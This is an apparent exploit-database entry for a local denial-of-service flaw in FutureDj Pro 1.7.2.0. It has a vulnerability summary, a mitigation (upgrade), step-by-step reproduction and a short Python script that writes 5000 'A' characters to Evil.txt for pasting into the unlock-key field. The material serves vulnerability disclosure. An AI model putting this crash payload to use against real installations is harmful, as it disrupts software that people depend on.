Vendor: FutureDj Pro
By: Achilles
CVSS: 7.8 (HIGH)
Type: Denial of Service
CWE: 400
Product Name: FutureDj Pro
Affected Version From: 1.7.2.0
Affected Version To: 1.7.2.0
Patch Exists: YES
Related CWE: N/A
CPE: a:xylio:future_dj_pro
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 7 SP1 Ultimate
2019

FutureDj Pro Local Dos Exploit

A denial-of-service vulnerability exists in FutureDj Pro version 1.7.2.0 (32-bit). A local attacker can trigger it by running a Python script that creates a file containing 5000 bytes of 'A' characters, copying the content of the file to the clipboard, opening the FutureDj Pro application, clicking 'start Free Trial', then 'Click here to Buy', then 'i already bought it', pasting the content of EVIL.txt into the 'Unlock key' Name field, and then clicking 'OK', 'OK' and 'Exit'. The application then crashes.

Mitigation:

Upgrade to the latest version of FutureDj Pro.

Exploit-DB raw data:

# Exploit Title: FutureDj Pro Local Dos Exploit
# Date: 07.02.2019
# Vendor Homepage: https://www.xylio.com
# Software Link:   https://www.xylio.com/future-dj-pro-a-new-level-of-mixing-perfection/
# Exploit Author: Achilles
# Tested Version: 1.7.2.0 32bit
# Tested on: Windows 7 SP1 Ultimate

# 1.- Run python code : FutureDj Pro.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open future.dj.exe
# 4.- In the New Window click start Free Trial and then 'Click here to Buy'
# 5.- And then 'i already bought it'
# 6.- Paste the Content of EVIL.txt into the 'Unlock key' Name field.
# 7.- Click 'OK'
# 8.- Click 'OK'
# 9.- Click 'Exit'
# 10.- And you will see a crash


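#!/usr/bin/env python

# Payload: 5000 'A' (0x41) characters
buffer = "\x41" * 5000

try:
    # Write the payload to Evil.txt in the current directory
    f = open("Evil.txt", "w")
    print("[+] Creating %s bytes evil payload.." % len(buffer))
    f.write(buffer)
    f.close()
    print("[+] File created!")
except IOError:
    # Raised when the file cannot be opened or written
    print("File cannot be created")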